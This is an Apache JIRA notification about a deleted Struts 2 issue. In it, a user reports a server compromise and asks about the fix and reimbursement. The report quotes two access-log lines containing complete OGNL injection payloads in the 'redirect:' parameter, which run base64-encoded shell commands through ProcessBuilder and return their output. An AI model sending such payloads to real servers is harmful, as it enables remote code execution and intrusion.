[
https://issues.apache.org/jira/browse/WW-4304?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
]
Lukasz Lenart deleted WW-4304:
------------------------------
> Security issues with sturts 2.3.x
> ---------------------------------
>
> Key: WW-4304
> URL: https://issues.apache.org/jira/browse/WW-4304
> Project: Struts 2
> Issue Type: Bug
> Environment: Ubuntu on microsoft windows azure
> Reporter: RAJA SEKHAR
> Labels: security
> Original Estimate: 96h
> Remaining Estimate: 96h
>
> Hi
> I have analyzed the logs for SMA and i found out the following in log files
> 202.82.228.91 - - [24/Feb/2014:04:31:49 +0000] "GET
> /testimonialsList.action?redirect:$%7B%23p%3Dnew%20java.lang.String(new+sun.misc.BASE64Decoder().decodeBuffer("d2hvYW1p")),%20%23a%3d%28new%20java.lang.ProcessBuilder%28%23p.split(%22%20%22)%29%29.start%28%29,%23b%3d%23a.getInputStream%28%29,%23c%3dnew%20java.io.InputStreamReader%28%23b%29,%23d%3dnew%20java.io.BufferedReader%28%23c%29,%23e%3dnew%20char%5B50000%5D,%23matt%3d%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29,%23arr%3Dnew%20int[1],%23len%3D%23d.read%28%23e%29,%20%23arr.{(%23len%3D%3D-1)%3F%23{%23len%3D-1}%3A{%23matt.getWriter%28%29.print%28new%20java.lang.String%28%23e,0,%23len%29%29,%23len%3D%23d.read%28%23e%29}},%23matt.getWriter%28%29.flush%28%29,%23matt.getWriter%28%29.close%28%29%7D
> HTTP/1.1" 200 15
> 202.82.228.91 - - [24/Feb/2014:04:31:49 +0000] "GET
> /testimonialsList.action?redirect:$%7B%23p%3Dnew%20java.lang.String(new+sun.misc.BASE64Decoder().decodeBuffer("dW5hbWUgLWE%3D")),%20%23a%3d%28new%20java.lang.ProcessBuilder%28%23p.split(%22%20%22)%29%29.start%28%29,%23b%3d%23a.getInputStream%28%29,%23c%3dnew%20java.io.InputStreamReader%28%23b%29,%23d%3dnew%20java.io.BufferedReader%28%23c%29,%23e%3dnew%20char%5B50000%5D,%23matt%3d%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29,%23arr%3Dnew%20int[100],%23len%3D%23d.read%28%23e%29,%23arr.{(%23len%3D%3D-1)%3F%23{%23len%3D-1}%3A{%23matt.getWriter%28%29.print%28new%20java.lang.String%28%23e,0,%23len%29%29,%23len%3D%23d.read%28%23e%29}},%23matt.getWriter%28%29.flush%28%29,%23matt.getWriter%28%29.close%28%29%7D
> HTTP/1.1" 200 115
> I have seen these entries in log file. Through this intruder has hacked the
> system by finding the issue name /passwords etc and he has taken control of
> the system.
> By this he created files in ROOT directory , and he was running DOS attacks
> on the system. This led to large data transfer and there was a bill of 1000$
> was generated to our customer. I found that the issue is fixed in version
> 2.3.16.
> I have following questions
> 1) are these issues are fixed in 2.3.16.
> 2) Since the root cause of the problem is with struts -2.3.1.1 , do you
> reimburse the bill.
> Please help us resolving this use
--
This message was sent by Atlassian JIRA
(v6.2#6252)
